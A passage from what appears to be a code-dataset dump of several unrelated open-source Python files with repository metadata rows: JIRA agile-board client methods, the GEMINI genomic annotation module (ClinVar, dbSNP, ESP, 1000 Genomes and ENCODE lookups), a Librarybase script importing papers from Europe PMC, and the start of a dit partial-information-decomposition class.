url, data=json.dumps(payload))
def create_board(self, name, project_ids, preset="scrum"):
"""
Create a new board for the ``project_ids``.
:param name: name of the board
:param project_ids: the projects to create the board in
:param preset: what preset to use for this board
:type preset: 'kanban', 'scrum', 'diy'
"""
payload = {}
if isinstance(project_ids, string_types):
ids = []
for p in project_ids.split(','):
ids.append(self.project(p).id)
project_ids = ','.join(ids)
payload['name'] = name
if isinstance(project_ids, string_types):
project_ids = project_ids.split(',')
payload['projectIds'] = project_ids
payload['preset'] = preset
url = self._get_url(
'rapidview/create/presets', base=self.AGILE_BASE_URL)
r = self._session.post(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Board(self._options, self._session, raw=raw_issue_json)
def create_sprint(self, name, board_id, startDate=None, endDate=None):
"""
Create a new sprint for the ``board_id``.
:param name: name of the sprint
:param board_id: the board to add the sprint to
"""
url = self._get_url(
'sprint/%s' % board_id, base=self.AGILE_BASE_URL)
r = self._session.post(
url)
raw_issue_json = json_loads(r)
""" now r contains something like:
{
"id": 742,
"name": "Sprint 89",
"state": "FUTURE",
"linkedPagesCount": 0,
"startDate": "None",
"endDate": "None",
"completeDate": "None",
"remoteLinks": []
}"""
payload = {'name': name}
if startDate:
payload["startDate"] = startDate
if endDate:
payload["endDate"] = endDate
url = self._get_url(
'sprint/%s' % raw_issue_json['id'], base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(payload))
raw_issue_json = json_loads(r)
return Sprint(self._options, self._session, raw=raw_issue_json)
# TODO: broken, this API does not exsit anymore and we need to use
# issue.update() to perform this operaiton
def add_issues_to_sprint(self, sprint_id, issue_keys):
"""
Add the issues in ``issue_keys`` to the ``sprint_id``. The sprint must
be started but not completed.
If a sprint was completed, then have to also edit the history of the
issue so that it was added to the sprint before it was completed,
preferably before it started. A completed sprint's issues also all have
a resolution set before the completion date.
If a sprint was not started, then have to edit the marker and copy the
rank of each issue too.
:param sprint_id: the sprint to add issues to
:param issue_keys: the issues to add to the sprint
"""
data = {}
data['issueKeys'] = issue_keys
url = self._get_url('sprint/%s/issues/add' %
(sprint_id), base=self.AGILE_BASE_URL)
r = self._session.put(url, data=json.dumps(data))
def add_issues_to_epic(self, epic_id, issue_keys, ignore_epics=True):
"""
Add the issues in ``issue_keys`` to the ``epic_id``.
:param epic_id: the epic to add issues to
:param issue_keys: the issues to add to the epic
:param ignore_epics: ignore any issues listed in ``issue_keys`` that are epics
"""
data = {}
data['issueKeys'] = issue_keys
data['ignoreEpics'] = ignore_epics
url = self._get_url('epics/%s/add' %
epic_id, base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
def rank(self, issue, next_issue):
"""
Rank an issue before another using the default Ranking field, the one named 'Rank'.
:param issue: issue key of the issue to be ranked before the second one.
:param next_issue: issue key of the second issue.
"""
# {"issueKeys":["ANERDS-102"],"rankBeforeKey":"ANERDS-94","rankAfterKey":"ANERDS-7","customFieldId":11431}
if not self._rank:
for field in self.fields():
if field['name'] == 'Rank' and field['schema']['custom'] == "com.pyxis.greenhopper.jira:gh-global-rank":
self._rank = field['schema']['customId']
data = {
"issueKeys": [issue], "rankBeforeKey": next_issue, "customFieldId": self._rank}
url = self._get_url('rank', base=self.AGILE_BASE_URL)
r = self._session.put(
url, data=json.dumps(data))
class GreenHopper(JIRA):
def __init__(self, options=None, basic_auth=None, oauth=None, async=None):
warnings.warn(
"GreenHopper() class is deprecated, just use JIRA() instead.", DeprecationWarning)
self._rank = None
JIRA.__init__(
self, options=options, basic_auth=basic_auth, oauth=oauth, async=async)
| bsd-2-clause | 4,014,760,144,798,227,500 | 38.09324 | 203 | 0.59418 | false |
poojavade/Genomics_Docker | Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/gemini-0.10.0-py2.7.egg/gemini/annotations.py | 1 | 30633 | #!/usr/bin/env python
import pysam
import sqlite3
import os
import sys
import collections
import re
from unidecode import unidecode
from bx.bbi.bigwig_file import BigWigFile
from gemini.config import read_gemini_config
# dictionary of anno_type -> open Tabix file handles
annos = {}
def get_anno_files( args ):
config = read_gemini_config( args = args )
anno_dirname = config["annotation_dir"]
# Default annotations -- always found
annos = {
'pfam_domain': os.path.join(anno_dirname, 'hg19.pfam.ucscgenes.bed.gz'),
'cytoband': os.path.join(anno_dirname, 'hg19.cytoband.bed.gz'),
'dbsnp': os.path.join(anno_dirname, 'dbsnp.138.vcf.gz'),
'clinvar': os.path.join(anno_dirname, 'clinvar_20140303.vcf.gz'),
'gwas': os.path.join(anno_dirname, 'hg19.gwas.bed.gz'),
'rmsk': os.path.join(anno_dirname, 'hg19.rmsk.bed.gz'),
'segdup': os.path.join(anno_dirname, 'hg19.segdup.bed.gz'),
'conserved': os.path.join(anno_dirname, '29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.hg19.merged.bed.gz'),
'cpg_island': os.path.join(anno_dirname, 'hg19.CpG.bed.gz'),
'dgv': os.path.join(anno_dirname, 'hg19.dgv.bed.gz'),
'esp': os.path.join(anno_dirname,
'ESP6500SI.all.snps_indels.vcf.gz'),
'1000g': os.path.join(anno_dirname,
'ALL.wgs.integrated_phase1_v3.20101123.snps_indels_sv.sites.2012Oct12.vcf.gz'),
'recomb': os.path.join(anno_dirname,
'genetic_map_HapMapII_GRCh37.gz'),
'gms': os.path.join(anno_dirname,
'GRCh37-gms-mappability.vcf.gz'),
'grc': os.path.join(anno_dirname, 'GRC_patch_regions.bed.gz'),
'cse': os.path.join(anno_dirname, "cse-hiseq-8_4-2013-02-20.bed.gz"),
'encode_tfbs': os.path.join(anno_dirname,
'wgEncodeRegTfbsClusteredV2.cell_count.20130213.bed.gz'),
'encode_dnase1': os.path.join(anno_dirname,
'stam.125cells.dnaseI.hg19.bed.gz'),
'encode_consensus_segs': os.path.join(anno_dirname,
'encode.6celltypes.consensus.bedg.gz'),
'gerp_elements': os.path.join(anno_dirname, 'hg19.gerp.elements.bed.gz'),
'vista_enhancers': os.path.join(anno_dirname, 'hg19.vista.enhancers.20131108.bed.gz'),
'cosmic': os.path.join(anno_dirname, 'hg19.cosmic.v67.20131024.gz')
}
# optional annotations
if os.path.exists(os.path.join(anno_dirname, 'hg19.gerp.bw')):
annos['gerp_bp'] = os.path.join(anno_dirname, 'hg19.gerp.bw')
if os.path.exists(os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')):
annos['cadd_score'] = os.path.join(anno_dirname, 'whole_genome_SNVs.tsv.compressed.gz')
return annos
class ClinVarInfo(object):
def __init__(self):
self.clinvar_dbsource = None
self.clinvar_dbsource_id = None
self.clinvar_origin = None
self.clinvar_sig = None
self.clinvar_dsdb = None
self.clinvar_dsdbid = None
self.clinvar_disease_name = None
self.clinvar_disease_acc = None
self.clinvar_in_omim = None
self.clinvar_in_locus_spec_db = None
self.clinvar_on_diag_assay = None
self.origin_code_map = {'0': 'unknown',
'1': 'germline',
'2': 'somatic',
'4': 'inherited',
'8': 'paternal',
'16': 'maternal',
'32': 'de-novo',
'64': 'biparental',
'128': 'uniparental',
'256': 'not-tested',
'512': 'tested-inconclusive',
'1073741824': 'other'}
self.sig_code_map = {'0': 'unknown',
'1': 'untested',
'2': 'non-pathogenic',
'3': 'probable-non-pathogenic',
'4': 'probable-pathogenic',
'5': 'pathogenic',
'6': 'drug-response',
'7': 'histocompatibility',
'255': 'other'}
def __repr__(self):
return '\t'.join([self.clinvar_dbsource,
self.clinvar_dbsource_id,
self.clinvar_origin,
self.clinvar_sig,
self.clinvar_dsdb,
self.clinvar_dsdbid,
self.clinvar_disease_name,
self.clinvar_disease_acc,
str(self.clinvar_in_omim),
str(self.clinvar_in_locus_spec_db),
str(self.clinvar_on_diag_assay)])
def lookup_clinvar_origin(self, origin_code):
try:
return self.origin_code_map[origin_code]
except KeyError:
return None
def lookup_clinvar_significance(self, sig_code):
if "|" not in sig_code:
try:
return self.sig_code_map[sig_code]
except KeyError:
return None
else:
sigs = set(sig_code.split('|'))
# e.g., 255|255|255
if len(sigs) == 1:
try:
return self.sig_code_map[sigs.pop()]
except KeyError:
return None
# e.g., 1|5|255
else:
return "mixed"
ESPInfo = collections.namedtuple("ESPInfo",
"found \
aaf_EA \
aaf_AA \
aaf_ALL \
exome_chip")
ENCODEDnaseIClusters = collections.namedtuple("ENCODEDnaseIClusters",
"cell_count \
cell_list")
ENCODESegInfo = collections.namedtuple("ENCODESegInfo",
"gm12878 \
h1hesc \
helas3 \
hepg2 \
huvec \
k562")
ThousandGInfo = collections.namedtuple("ThousandGInfo",
"found \
aaf_ALL \
aaf_AMR \
aaf_ASN \
aaf_AFR \
aaf_EUR")
def load_annos( args ):
"""
Populate a dictionary of Tabixfile handles for
each annotation file. Other modules can then
access a given handle and fetch data from it
as follows:
dbsnp_handle = annotations.annos['dbsnp']
hits = dbsnp_handle.fetch(chrom, start, end)
"""
anno_files = get_anno_files( args )
for anno in anno_files:
try:
# .gz denotes Tabix files.
if anno_files[anno].endswith(".gz"):
annos[anno] = pysam.Tabixfile(anno_files[anno])
# .bw denotes BigWig files.
elif anno_files[anno].endswith(".bw"):
annos[anno] = BigWigFile( open( anno_files[anno] ) )
except IOError:
sys.exit("Gemini cannot open this annotation file: %s. \n"
"Have you installed the annotation files? If so, "
"have they been moved or deleted? Exiting...\n\n"
"For more details:\n\t"
"http://gemini.readthedocs.org/en/latest/content/"
"#installation.html\#installing-annotation-files\n"
% anno_files[anno])
# ## Standard access to Tabix indexed files
def _get_hits(coords, annotation, parser_type):
"""Retrieve BED information, recovering if BED annotation file does have a chromosome.
"""
if parser_type == "bed":
parser = pysam.asBed()
elif parser_type == "vcf":
parser = pysam.asVCF()
elif parser_type == "tuple":
parser = pysam.asTuple()
elif parser_type is None:
parser = None
else:
raise ValueError("Unexpected parser type: %s" % parser)
chrom, start, end = coords
try:
hit_iter = annotation.fetch(str(chrom), start, end, parser=parser)
# catch invalid region errors raised by ctabix
except ValueError:
hit_iter = []
# recent versions of pysam return KeyError
except KeyError:
hit_iter = []
return hit_iter
def _get_bw_summary(coords, annotation):
"""Return summary of BigWig scores in an interval
"""
chrom, start, end = coords
try:
return annotation.summarize(str(chrom), start, end, end-start).min_val[0]
except AttributeError:
return None
def _get_chr_as_grch37(chrom):
if chrom in ["chrM"]:
return "MT"
return chrom if not chrom.startswith("chr") else chrom[3:]
def _get_chr_as_ucsc(chrom):
return chrom if chrom.startswith("chr") else "chr" + chrom
def guess_contig_naming(anno):
"""Guess which contig naming scheme a given annotation file uses.
"""
chr_names = [x for x in anno.contigs if x.startswith("chr")]
if len(chr_names) > 0:
return "ucsc"
else:
return "grch37"
def _get_var_coords(var, naming):
"""Retrieve variant coordinates from multiple input objects.
"""
if isinstance(var, dict) or isinstance(var, sqlite3.Row):
chrom = var["chrom"]
start = int(var["start"])
end = int(var["end"])
else:
chrom = var.CHROM
start = var.start
end = var.end
if naming == "ucsc":
chrom = _get_chr_as_ucsc(chrom)
elif naming == "grch37":
chrom = _get_chr_as_grch37(chrom)
return chrom, start, end
def _get_cadd_scores(var, labels, hit):
"""
get cadd scores
"""
raw = hit[3].split(",")
scaled = hit[4].split(",")
p = re.compile(str(var.ALT[0]))
for m in p.finditer(str(labels[hit[2]])):
pos = m.start()
return raw[pos], scaled[pos]
def annotations_in_region(var, anno, parser_type=None, naming="ucsc"):
"""Iterator of annotations found in a genomic region.
- var: PyVCF object or database query with chromosome, start and end.
- anno: pysam Tabix annotation file or string to reference
a standard annotation
- parser_type: string specifying the filetype of the tabix file
- naming: chromosome naming scheme used, ucsc or grch37
"""
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_hits(coords, anno, parser_type)
def bigwig_summary(var, anno, naming="ucsc"):
coords = _get_var_coords(var, naming)
if isinstance(anno, basestring):
anno = annos[anno]
return _get_bw_summary(coords, anno)
# ## Track-specific annotations
def get_cpg_island_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a CpG island
"""
for hit in annotations_in_region(var, "cpg_island", "bed"):
return True
return False
# def get_dbNSFP_info(var, impacts):
# """
# Returns Polyphen, SIFT, etc. from dbNSFP annotation file.
# One prediction per transcript.
# LIMITATION: only handles bi-allelic loci
# """
# # is this variant predicted to be nonsynonymous for any of the transcripts?
# # if not, we can skip dnNSFP.
# non_syn_impacts = [imp for imp in impacts \
# if imp.consequence == 'non_syn_coding']
# if len(non_syn_impacts) > 0:
# for hit in annotations_in_region(var, "dbnsfp", parser_type="tuple", naming="grch37"):
# if var.POS == int(hit[1]) and \
# var.REF == hit[2] and \
# var.ALT[0] == hit[3]:
# transcripts = hit[7].split(';')
# aapos = hit[8].split(';')
# pp_scores = hit[11].split(';')
# if len(transcripts) != len(pp_scores):
# print var.POS, var.REF, var.ALT[0], [i.transcript for i in non_syn_impacts], \
# [i.polyphen_pred for i in non_syn_impacts], [i.polyphen_score for i in non_syn_impacts], \
# hit[7], hit[8], hit[11], hit[12]
# else:
# pass
def get_cyto_info(var):
"""
Returns a comma-separated list of the chromosomal
cytobands that a variant overlaps.
"""
cyto_band = ''
for hit in annotations_in_region(var, "cytoband", "bed"):
if len(cyto_band) > 0:
cyto_band += "," + hit.contig + hit.name
else:
cyto_band += hit.contig + hit.name
return cyto_band if len(cyto_band) > 0 else None
def get_gerp_bp(var):
"""
Returns a summary of the GERP scores for the variant.
"""
if "gerp_bp" not in annos:
raise IOError("Need to download BigWig file with GERP scores per base pair. "
"Run `gemini update --dataonly --extra gerp_bp")
gerp = bigwig_summary(var, "gerp_bp")
return gerp
def get_gerp_elements(var):
"""
Returns the GERP element information.
"""
p_vals = []
for hit in annotations_in_region(var, "gerp_elements", "tuple"):
p_vals.append(hit[3])
if len(p_vals) == 1:
return p_vals[0]
elif len(p_vals) > 1:
return min(float(p) for p in p_vals)
else:
return None
def get_vista_enhancers(var):
"""
Returns the VISTA enhancer information.
"""
vista_enhancers = []
for hit in annotations_in_region(var, "vista_enhancers", "tuple"):
vista_enhancers.append(hit[4])
return ",".join(vista_enhancers) if len(vista_enhancers) > 0 else None
def get_cadd_scores(var):
"""
Returns the C-raw scores & scaled scores (CADD) to predict deleterious
variants. Implemented only for SNV's
"""
if "cadd_score" not in annos:
raise IOError("Need to download the CADD data file for deleteriousness."
"Run `gemini update --dataonly --extra cadd_score")
cadd_raw = cadd_scaled = None
labels = {"A":"CGT", "C":"AGT", "G":"ACT", "T":"ACG", "R":"ACGT", "M":"ACGT"}
for hit in annotations_in_region(var, "cadd_score", "tuple", "grch37"):
# we want exact position mapping here and not a range (end-start) as
# returned in hit (e.g. indels) & we do not want to consider del & ins
if str(hit[1]) == str(var.POS) and len(var.REF) == 1 and \
len(var.ALT[0]) == 1:
if str(hit[2]) == var.REF and str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
# consider ref cases with ambiguity codes R (G,A) and M (A,C)
elif ((str(hit[2]) == 'R' and var.REF in('G','A')) or \
(str(hit[2]) == 'M' and var.REF in('A','C'))) and \
str(var.ALT[0]) in labels[hit[2]]:
(cadd_raw, cadd_scaled) = _get_cadd_scores(var, labels, hit)
return (cadd_raw, cadd_scaled)
def get_pfamA_domains(var):
"""
Returns pfamA domains that a variant overlaps
"""
pfam_domain = []
for hit in annotations_in_region(var, "pfam_domain", "bed"):
pfam_domain.append(hit.name)
return ",".join(pfam_domain) if len(pfam_domain) > 0 else None
def get_cosmic_info(var):
"""
Returns a list of COSMIC ids associated with given variant
E.g. from COSMIC VCF
#CHROM POS ID REF ALT QUAL FILTER INFO
chrM 1747 COSN408408 G A . . .
chrM 2700 COSN408409 G A . . .
chr1 42880262 COSM464635 G C . . AA=p.D224H;CDS=c.670G>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880269 COSM909628 G A . . AA=p.G226D;CDS=c.677G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880284 COSM1502979 G T . . AA=p.C231F;CDS=c.692G>T;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880318 COSM681351 T A . . AA=p.F242L;CDS=c.726T>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880337 COSM464636 G A . . AA=p.D249N;CDS=c.745G>A;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880384 COSM909629 T C . . AA=p.N264N;CDS=c.792T>C;CNT=1;GENE=RIMKLA;STRAND=+
chr1 42880415 COSM909630 G C . . AA=p.G275R;CDS=c.823G>C;CNT=1;GENE=RIMKLA;STRAND=+
"""
# report the first overlapping ClinVar variant Most often, just one).
cosmic_ids = []
for hit in annotations_in_region(var, "cosmic", "vcf", "ucsc"):
cosmic_ids.append(hit.id)
return ",".join(cosmic_ids) if len(cosmic_ids) > 0 else None
def get_clinvar_info(var):
"""
Returns a suite of annotations from ClinVar
ClinVarInfo named_tuple:
--------------------------------------------------------------------------
# clinvar_dbsource = CLNSRC=OMIM Allelic Variant;
# clinvar_dbsource_id = CLNSRCID=103320.0001;
# clinvar_origin = CLNORIGIN=1
# clinvar_sig = CLNSIG=5
# clinvar_dsdb = CLNDSDB=GeneReviews:NCBI:OMIM:Orphanet;
# clinvar_dsdbid = CLNDSDBID=NBK1168:C1850792:254300:590;
# clinvar_disease_name = CLNDBN=Myasthenia\x2c limb-girdle\x2c familial;
# clinvar_disease_acc = CLNACC=RCV000019902.1
# clinvar_in_omim = OM
# clinvar_in_locus_spec_db = LSD
# clinvar_on_diag_assay = CDA
"""
clinvar = ClinVarInfo()
# report the first overlapping ClinVar variant Most often, just one).
for hit in annotations_in_region(var, "clinvar", "vcf", "grch37"):
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
else:
info_map[info] = True
raw_dbsource = info_map['CLNSRC'] or None
#interpret 8-bit strings and convert to plain text
clinvar.clinvar_dbsource = unidecode(raw_dbsource.decode('utf-8'))
clinvar.clinvar_dbsource_id = info_map['CLNSRCID'] or None
clinvar.clinvar_origin = \
clinvar.lookup_clinvar_origin(info_map['CLNORIGIN'])
clinvar.clinvar_sig = \
clinvar.lookup_clinvar_significance(info_map['CLNSIG'])
clinvar.clinvar_dsdb = info_map['CLNDSDB'] or None
clinvar.clinvar_dsdbid = info_map['CLNDSDBID'] or None
# Remap all unicode characters into plain text string replacements
raw_disease_name = info_map['CLNDBN'] or None
clinvar.clinvar_disease_name = unidecode(raw_disease_name.decode('utf-8'))
# Clinvar represents commas as \x2c. Make them commas.
clinvar.clinvar_disease_name = clinvar.clinvar_disease_name.decode('string_escape')
clinvar.clinvar_disease_acc = info_map['CLNACC'] or None
clinvar.clinvar_in_omim = 1 if 'OM' in info_map else 0
clinvar.clinvar_in_locus_spec_db = 1 if 'LSD' in info_map else 0
clinvar.clinvar_on_diag_assay = 1 if 'CDA' in info_map else 0
return clinvar
def get_dbsnp_info(var):
"""
Returns a suite of annotations from dbSNP
"""
rs_ids = []
for hit in annotations_in_region(var, "dbsnp", "vcf", "grch37"):
rs_ids.append(hit.id)
# load each VCF INFO key/value pair into a DICT
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=")
info_map[key] = value
return ",".join(rs_ids) if len(rs_ids) > 0 else None
def get_esp_info(var):
"""
Returns a suite of annotations from the ESP project
ESP reports the minor allele frequency (MAF), not the
alternate allele frequency (AAF). We must therefore figure
out whther the reference or alternate allele is the minor allele.
1 69496 rs150690004 G A . PASS DBSNP=dbSNP_134;EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549;MAF=0.0296,0.604,0.2364;GTS=AA,AG,GG;EA_GTC=0,2,3381;AA_GTC=5,13,1886;GTC=5,15,5267;DP=91;GL=OR4F5;CP=0.5;CG=2.3;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=SER/GLY;PP=136/306;CDP=406;GS=56;PH=benign
1 69511 rs75062661 A G . PASS DBSNP=dbSNP_131;EA_AC=5337,677;AA_AC=1937,1623;TAC=7274,2300;MAF=11.2571,45.5899,24.0234;GTS=GG,GA,AA;EA_GTC=2430,477,100;AA_GTC=784,369,627;GTC=3214,846,727;DP=69;GL=OR4F5;CP=1.0;CG=1.1;AA=G;CA=.;EXOME_CHIP=no;GWAS_PUBMED=.;GM=NM_001005484.1;FG=missense;AAC=ALA/THR;PP=141/306;CDP=421;GS=58;PH=benign
"""
aaf_EA = aaf_AA = aaf_ALL = None
maf = fetched = con = []
exome_chip = False
found = False
info_map = {}
for hit in annotations_in_region(var, "esp", "vcf", "grch37"):
if hit.contig not in ['Y']:
fetched.append(hit)
# We need a single ESP entry for a variant
if fetched != None and len(fetched) == 1 and \
hit.alt == var.ALT[0] and hit.ref == var.REF:
found = True
# loads each VCF INFO key/value pair into a DICT
for info in hit.info.split(";"):
if info.find("=") > 0:
# splits on first occurence of '='
# useful to handle valuerror: too many values to unpack (e.g (a,b) = split(",", (a,b,c,d)) for cases like
# SA=http://www.ncbi.nlm.nih.gov/sites/varvu?gene=4524&%3Brs=1801131|http://omim.org/entry/607093#0004
(key, value) = info.split("=", 1)
info_map[key] = value
# get the allele counts so that we can compute alternate allele frequencies
# example: EA_AC=2,6764;AA_AC=23,3785;TAC=25,10549
if info_map.get('EA_AC') is not None:
lines = info_map['EA_AC'].split(",")
aaf_EA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('AA_AC') is not None:
lines = info_map['AA_AC'].split(",")
aaf_AA = float(lines[0]) / (float(lines[0]) + float(lines[1]))
if info_map.get('TAC') is not None:
lines = info_map['TAC'].split(",")
aaf_ALL = float(lines[0]) / (float(lines[0]) + float(lines[1]))
# Is the SNP on an human exome chip?
if info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "no":
exome_chip = 0
elif info_map.get('EXOME_CHIP') is not None and \
info_map['EXOME_CHIP'] == "yes":
exome_chip = 1
return ESPInfo(found, aaf_EA, aaf_AA, aaf_ALL, exome_chip)
def get_1000G_info(var):
"""
Returns a suite of annotations from the 1000 Genomes project
"""
#fetched = []
info_map = {}
found = False
for hit in annotations_in_region(var, "1000g", "vcf", "grch37"):
# We need to ensure we are dealing with the exact sample variant
# based on position and the alleles present.
if var.start == hit.pos and \
var.ALT[0] == hit.alt and \
hit.ref == var.REF:
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
found = True
return ThousandGInfo(found, info_map.get('AF'), info_map.get('AMR_AF'),
info_map.get('ASN_AF'), info_map.get('AFR_AF'),
info_map.get('EUR_AF'))
def get_rmsk_info(var):
"""
Returns a comma-separated list of annotated repeats
that overlap a variant. Derived from the UCSC rmsk track
"""
rmsk_hits = []
for hit in annotations_in_region(var, "rmsk", "bed"):
rmsk_hits.append(hit.name)
return ",".join(rmsk_hits) if len(rmsk_hits) > 0 else None
def get_segdup_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a known segmental duplication.
"""
for hit in annotations_in_region(var, "segdup", "bed"):
return True
return False
def get_conservation_info(var):
"""
Returns a boolean indicating whether or not the
variant overlaps a conserved region as defined
by the 29-way mammalian conservation study.
http://www.nature.com/nature/journal/v478/n7370/full/nature10530.html
Data file provenance:
http://www.broadinstitute.org/ftp/pub/assemblies/mammals/29mammals/ \
29way_pi_lods_elements_12mers.chr_specific.fdr_0.1_with_scores.txt.gz
# Script to convert for gemini:
gemini/annotation_provenance/make-29way-conservation.sh
"""
for hit in annotations_in_region(var, "conserved", "bed"):
return True
return False
def get_recomb_info(var):
"""
Returns the mean recombination rate at the site.
"""
count = 0
tot_rate = 0.0
for hit in annotations_in_region(var, "recomb", "bed"):
if hit.contig not in ['chrY']:
# recomb rate file is in bedgraph format.
# pysam will store the rate in the "name" field
count += 1
tot_rate += float(hit.name)
return float(tot_rate) / float(count) if count > 0 else None
def _get_first_vcf_hit(hit_iter):
if hit_iter is not None:
hits = list(hit_iter)
if len(hits) > 0:
return hits[0]
def _get_vcf_info_attrs(hit):
info_map = {}
for info in hit.info.split(";"):
if info.find("=") > 0:
(key, value) = info.split("=", 1)
info_map[key] = value
return info_map
def get_gms(var):
"""Return Genome Mappability Scores for multiple technologies.
"""
techs = ["illumina", "solid", "iontorrent"]
GmsTechs = collections.namedtuple("GmsTechs", techs)
hit = _get_first_vcf_hit(
annotations_in_region(var, "gms", "vcf", "grch37"))
attr_map = _get_vcf_info_attrs(hit) if hit is not None else {}
return apply(GmsTechs,
[attr_map.get("GMS_{0}".format(x), None) for x in techs])
def get_grc(var):
"""Return GRC patched genome regions.
"""
regions = set()
for hit in annotations_in_region(var, "grc", "bed", "grch37"):
regions.add(hit.name)
return ",".join(sorted(list(regions))) if len(regions) > 0 else None
def get_cse(var):
"""Return if a variant is in a CSE: Context-specific error region.
"""
for hit in annotations_in_region(var, "cse", "bed", "grch37"):
return True
return False
def get_encode_tfbs(var):
"""
Returns a comma-separated list of transcription factors that were
observed to bind DNA in this region. Each hit in the list is constructed
as TF_CELLCOUNT, where:
TF is the transcription factor name
CELLCOUNT is the number of cells tested that had nonzero signals
NOTE: the annotation file is in BED format, but pysam doesn't
tolerate BED files with more than 12 fields, so we just use the base
tuple parser and grab the name column (4th column)
"""
tfbs = []
for hit in annotations_in_region(var, "encode_tfbs", "tuple"):
tfbs.append(hit[3] + "_" + hit[4])
if len(tfbs) > 0:
return ','.join(tfbs)
else:
return None
def get_encode_dnase_clusters(var):
"""
If a variant overlaps a DnaseI cluster, return the number of cell types
that were found to have DnaseI HS at in the given interval, as well
as a comma-separated list of each cell type:
Example data:
chr1 20042385 20042535 4 50.330600 8988t;K562;Osteobl;hTH1
chr1 20043060 20043210 3 12.450500 Gm12891;T47d;hESCT0
chr1 20043725 20043875 2 5.948180 Fibrobl;Fibrop
chr1 20044125 20044275 3 6.437350 HESC;Ips;hTH1
"""
for hit in annotations_in_region(var, "encode_dnase1", "tuple"):
return ENCODEDnaseIClusters(hit[3], hit[5])
return ENCODEDnaseIClusters(None, None)
def get_encode_consensus_segs(var):
"""
Queries a meta-BEDGRAPH of consensus ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
CTCF: CTCF-enriched element
E: Predicted enhancer
PF: Predicted promoter flanking region
R: Predicted repressed or low-activity region
TSS: Predicted promoter region including TSS
T: Predicted transcribed region
WE: Predicted weak enhancer or open chromatin cis-regulatory element
"""
for hit in annotations_in_region(var, "encode_consensus_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_segway_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_segway_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_encode_chromhmm_segs(var):
"""
Queries a meta-BEDGRAPH of SegWay ENCODE segmentations for 6 cell types:
gm12878, h1hesc, helas3, hepg2, huvec, k562
Returns a 6-tuple of the predicted chromatin state of each cell type for the
region overlapping the variant.
"""
for hit in annotations_in_region(var, "encode_chromhmm_segs", "tuple"):
return ENCODESegInfo(hit[3], hit[4], hit[5], hit[6], hit[7], hit[8])
return ENCODESegInfo(None, None, None, None, None, None)
def get_resources( args ):
"""Retrieve list of annotation resources loaded into gemini.
"""
anno_files = get_anno_files( args )
return [(n, os.path.basename(anno_files[n])) for n in sorted(anno_files.keys())]
| apache-2.0 | 5,353,853,671,318,104,000 | 37.726928 | 369 | 0.565338 | false |
tarrow/librarybase-pwb | addpapers.py | 1 | 1993 | import queryCiteFile
import librarybase
import pywikibot
from epmclib.getPMCID import getPMCID
from epmclib.exceptions import IDNotResolvedException
import queue
import threading
import time
def rununthreaded():
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for idx, citation in enumerate(citations[10513:]):
addpaper(idx, citation)
def runthreaded():
threads = []
for i in range(10):
t = threading.Thread(target=worker())
t.start()
threads.append(t)
citefile = queryCiteFile.CiteFile()
citations = citefile.findRowsWithIDType('pmc')
for citation in enumerate(citations[10513:]):
q.put(citation)
q.join()
for i in range(10):
q.put(None)
for t in threads:
t.join()
def worker():
while True:
idx, citation = q.get()
addpaper( idx, citation )
q.task_done()
def addpaper( idx, citation ):
start=time.time()
print(citation)
if citation is None:
return
print('trying to add {} number {}'.format(citation[5], idx))
site = pywikibot.Site("librarybase", "librarybase")
item = librarybase.JournalArticlePage(site)
pmcidobj = getPMCID(citation[5])
try:
pmcidobj.getBBasicMetadata()
except IDNotResolvedException:
print('Couldn\'t find in EPMC:' + citation[5])
return
metadata = pmcidobj.metadata
print("Got metadata in:" + str(time.time()-start))
if not item.articleAlreadyExists(metadata['pmcid']):
print('Item doesn\'t seem to exist. Setting metadata for: ' + metadata['pmcid'])
item.setMetaData(metadata)
print("set metadata in" + str(time.time()-start))
else:
print("{} already exists. Doing nothing".format(metadata['pmcid']))
q=queue.Queue()
rununthreaded() | mit | 4,137,417,748,321,423,400 | 27.776119 | 92 | 0.60562 | false |
Autoplectic/dit | dit/pid/iwedge.py | 1 | 1110 | """
The I_wedge measure, as proposed by Griffith et al.
"""
from __future__ import division
from .pid import BasePID
from .. import Distribution
from ..algorithms import insert_meet
from ..multivariate import coinformation
class PID_GK(BasePID):
"""
The Griffith et al partial information decomposition.
This PID is known to produce negative partial information values.
"""
_name = "I_GK"
